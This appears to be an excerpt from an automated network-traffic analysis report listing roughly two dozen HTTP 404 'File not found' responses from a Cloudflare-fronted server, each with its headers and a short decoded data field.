Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:01 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RwxyEXrfJWD7HzQsJLaaJ4ykrDR%2FXfvMae8i0xj3UPR%2Bl89OWY%2FzFHl6zIsjt3MczmsMNyXqydAx4kl6J4imX5JAkkeop22%2Bp9dS34N1vYjp83Fzoam6oRK%2Bx64oqTTVoWsVbFiS6fNE%2F4OFRWqA4k1a9wK%2Feg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec03d7f2c3250-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:03 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=91AmIffLnKe4Pbncz7KrUdCC7%2FIC1zkuoHQN1JfssoGk24gGXGVgK%2FfjSd%2BRFPNjQzfYkOwMtC%2FXqL%2BrxK2TSNEenBHg5Mzc%2Fbxkf4%2Fw%2FzewmKsOYKbBYCwux31XnGOv3FNqWKnELOMAweMsH1mdlUR0lqprnw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0464cd51772-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:06 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vcIT0xtrtdVqZu8AstBfvjAOVLZeU0jJkIg51LaEYzt2WcaP0aINNFdyPyzHGCi%2BFUn%2Bt9DitNetNAaC7a2WU1CkIz4esUAOdjvWe6RoWWH3jxFIhJPzOheLtuS4TLQLSt5M8LPLyDNCbhVFlEiI3yXDVeNVew%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec059aa9618e5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:07 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AsF%2F42rJeMS4o1jyaWpX5rcN1C7%2BwlYe9QyAvadZhUprUUDjjvl2mBaUHv2qSzvsM16RfVyDjciOwaQ0dYaMDLZXn9BBMNQ78ci9geDbIWxYBOq%2Ff7WlFnJZqgqdZEFqzws6tXcgPBAa0hiRMJyXMKzh%2BY5Kzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0621a7342f1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:08 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AETlKv0JLdUaJlMFIYw4c%2FUS3KY3jsZfqgBBcqkQPH7kBiRqISjQcPL9%2F6EycOt8Q0b%2BrCiBpVWf2JTuaTeRvPun%2BVdjS3dtjl0255v8MUhEF3A8ouzlFjwM9m5wMuIPxpMuRcbOokOsnygMEGf%2FVwZGMBD6qw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0698d3268e5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:10 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=erKQyQL4NJDpVARn6gPTghRshW34aWgx999kFto0hxMgvDWKpjzkg8Ub9PghJyk1Z5TjvoNbgssstoLWvM30lY7gyqwlTQwOwpeLID12mO81PbUOzRbpTH9BULjM1lW%2FOKhQiir%2FSFqgaO1xg4olF%2FOm%2FEl05Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec070fbf74e98-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:11 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FYS21KNhhPKeyLYemwqTO7CJfgOLB%2BcE8nmbaXZezuXpmbCfYbooJZGrTK1I2wCAIGGXi7Mmgbbcm9cTp0SlhyncjZPkn5v4lky0Kk4tKiYowD6Fp1RjLa2jaLWKfS7dODQ0ElVEAkA4Fmys4RO0oXOblnwXng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0788baf7049-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:12 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B2qI3uPr1SHaFu9HAlyv12q%2Fhc2IMayWd%2Bj1fcV0AkZcaVue84gdm%2F7cQrR6vLY0VY7KYJBbWGLpWPtzrfM9eaBQPFNmCRI7TpAHhLrs47U15LbrrJR0WJX9Oc%2Bk59NVPnfHDIGNV6BI%2BfF99GVheeaXjWvcKA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0803a323128-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:13 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vLfAG7fmX6CyxJzEk0O%2FBmg16SmrBE5YBS%2BRqup8BBlwc6IKUiq47jBhstgYikzkzMesviFQn6p1zW4GFv1I33WYuGftqKKV0g1GwmVoOI9dfpmoaBmAp7BfaYYlwjL6gInDoblSgql%2F6c1Q%2FtwThQC5OxPEAg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec088686f5c38-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:15 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vIoJjlpOUB4ch8A9vB%2FKQqgVGqG%2FBMM%2BfQzehosuEFSNQFo0gE9WIhQc2ZWAsVfi803z79IZC7COD7vw7q3ZvK9f7Lpn0xBwaC95bSAWCuYNsNId8NhJwwCkVxQHYxnxd4FRF8MJkTCEfItWcIZzhdJYp6PXZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec091ad1b4aaa-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:16 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B6WLQ0YL6zFlWhHgnt6U6cMjNqhg5htzjtx%2FJ7jjaqAcyvmGs5vvqQFzydOJ0caWu3xNVdyUaeMy0GV8mS37gvIqcjdOZZ0esg5rlfOM%2FG%2FhL%2Bsg9F9ZhQbRtpEBXBQq5liRP8vYQAFgvHT%2FvZ5gZZtn75E7xw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec09b293e5be5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:18 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NEEHx%2BkmIT9asVndpNXR1AoGjnCHChsMAYShF5yGwYqEj%2FgJsdB0Mx0KbcltXiFP56kkMvROqu%2FHNChiSzQKeS2N34dJxa42lt0RG86mw%2F6702IFnVtlIfN7UOJyiytUwY3ivfQHS555wFEzMe%2FIT1fowiWd1w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0a39b634e8b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:20 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4smlu4lSWaMUj8PWc%2BGpmke%2BENRvCwicQAhGufEzY4Xwa7kc3y6YhyyyYu%2BwPR0zEsPEe1hN0%2BiA2kWHr%2FJE%2BXajyLuEfTCC38E6%2FySGXkOUU0sGE9B9d2NunzFnN9Jpxmznzq%2BWLqFLCc88Y6o8kCh%2BJdWbng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0b28e524e5c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:21 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rzu%2FohVuhjczWDe7tSOrF0uRiMZdPJrfjpN1hISShviTn6CxquhhvYU2ZYQ2Afh3g6P1FuSAKzKR6pmpqQCL727H0cqqtCgKFYjeXiZlAHmuAv%2B5N6h1XDjgPB5X%2FZuAlzCAkAnMt54YuBWaZYpOMDRgoMijug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0bb69254339-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:23 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PIDL4Ex4yVSKIruz6ska5ciNfQXYfiK08MG3n%2Fl5sBh3uTbHelpQ%2BjFtXJazHaCXD%2FcS9T%2FNICexg23jtCzdGJnXlzeuuDLWonv2ZPeq4lMjDt5h2txZPLlLYA9u9inYXLCUr1h1CBSjz2d%2B08xCKW78cQE3ng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0c56e57d6d1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:27 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ltrm6sBYZ30PkF8Z7VQJ7TUsrGZvzAnFrCkFXlgpwUKIwSLl0AKErABPq3oLlrSThb2YL8K3CEZTNit0GLpNLsiF78D%2Bo%2FeB6vJTTi3fwh0lA8bdxzosx88%2BepGYJVN9NOxQjuwGMKesX%2FSg1REiYGp8lFNnQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0debb1b68f7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:29 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tR8YTHsFUlHBp8jLYHNxWg6PfHZ0Q9qY6Z3f00iw%2FRPkfDCJWPs2NCsHs%2BJRNc7qtmk0cQf9cr5pQNsUFXF%2BJcUJy6DqBggagu08v%2BAxRuxiMb5hoOAO2BqKdlUHQOZJ0B4Pm%2FOMKal28DTap0fJzQTMHSpwyg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0ec5bd44401-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:31 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L2EsWzEZJKWTDEn93sKWFLzev8Sl0yir0x01b%2BkSL3ujzOb1%2BV3ppWcxuzQdjug6QJKPfPBqA70PVP6l0gcrvl1Nke8DdVo%2BNZdDAhag%2BRgxa5KekRs3f6n4KUeQs4FC1ErSaLb8kvrBEaD%2FKEum9jCbi9W6LA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0f9584568fe-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:33 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wa5i4pYc47XTZTSRKuePuJGDKfzroVXSpP4vHBUDcpsntok8NHAncV7jpTLBPs6CkrH8kUIW9ytBz2JwxWNyMqJw1jmWzD%2Fy1Bnna2df9JCgcS%2Fw7JdgzCjsdEOd%2BbuV0ccxxBXnyytwG6K3l%2FcIIvtKwmy4fQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1015b90702b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:35 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=68hgMnUBuHCsDUjLDFpqWCCQ2g0nALTKRqB%2BkiRtXAxjxPALNlT80KDT0GEMZAtpHUyMeDuNH4MC3L2MUas1uw3Tkjx5nm6dtpUi4kAfnIyf5i1cJw47x%2BYEBToHMbM6J5K1gQPhnXfkSWBbeb76%2Bs%2F4PqZQXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec10f6862646d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:37 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YUMi%2BKCQiebAYfk%2BBHidFFMjdX1L%2B1Iti6n0n9f53wMYFdVumBnToBBg78Fzogxr7V3VykOGcApOxm9l1ZNdwS3q1NBnlV56c4eet1gWdXUfPWzTFfWnX4HH4BnbmoIGtizbJCTdvwv6CXf3B0vdLyoWMpNG7g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec11a19e04a7f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:38 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R6o5MMg7SbvUqktXOhLjA1Fnbswl29jahtPLPtZB%2F4x11eIb1xozO%2BsAnzF9weZv0qW6u4hDKdl%2FulXZxPK440HB6R9%2BHt10S57wJou4G%2B1ynyQn8M318af4%2FOta46SlgLFPdMQ9Fk1N%2Bbz9IjlO9LnEHUhfxw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1216ed06927-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:39 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hGTok4Pwn41ZRv1MumUHtTCRvKskuQeV7Tzz2LKP7TXQ%2BjHQX%2Bdc7hCUk0B93YW6i4W3l25Za7zFA9%2BUgikpTke7QSUXWzExiifQ89U8wsISzKRfHFHuLqm%2BOsRCRCWUlSjMQHz33ABcV%2F%2BHbvOmCP2te4WgCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1291bfb6943-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:40 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1W6FUoErQkVxlBPw7%2BXATW83hqhBSlVS6%2FhzlhKejgcPspDjQWYsm3X5UX3pJCE9Ts7B%2BzefPUHY%2BB%2BB8iI5yQqS8bnXyeWA6pA0FPv3X6QGWOzitWjJfeequ1dvbp%2FoQG57ZdzOBYGjNXOLdmI%2FpOQ67mjazg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1317c562c32-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:41 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GO6eCdCM4%2F6hA7dtd%2FoaiUrVjzpTaEYd0xVhp5YRWC%2BcFYd%2B827KZzyPcBHQZIMwEPE1lsx4Y%2FXrxohcjCmA2j%2FkkXNqUbdwkLVmbF7cdjV7n1NxRpQeMBRyy%2FLA0LTuL7Nvjpyb%2Buz9nG1ScVdle1E27JKKHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec138b9821456-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:43 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CxsCHuzow%2F33c%2FCkji95GCcFRRddEjpXSTQlsgwfn1tNfjUG93xxIl1QFhyVjuOCfzG3xO4Dx0oqdciEFdAMIjFtDzSwsy%2BZAnBFJ%2BUIcvKJcPAL57TCTabS1rK7mISZlPofKYNa1NQhc21szCDAJAXGAw7LbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec14189124e0d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:44 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MFrv0XyktSeHA%2B%2FfE1zcEPcFFNmyDk1d8pBeW%2BPZ0DJJyDKM24IqF9Ua%2FLPJGa2QUt1%2F9p1PJhMy%2FqaXGD1%2FbCm79J0uGI0QAXTq9IQa9oVo94V3focmH3c91ymeJg1qFR1TPjejGWcfhJ7eFrLUoAL7XbrPtQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec148ba214e14-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:45 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RW1TGqFwuxrswdzsjqOAixFxJjq9GdKUdYo7aOj19dNBG4Lyyy7SsCmQykgjcONrTmazNouCKp2Z9hD9oj9zcv4osPlARNNPDj7pHenc2sXbowSWmyPcUlYaDlCHIFiv0mk3hl9DBkS9teWGWpN7dgSnssg4aw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1510989d70d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
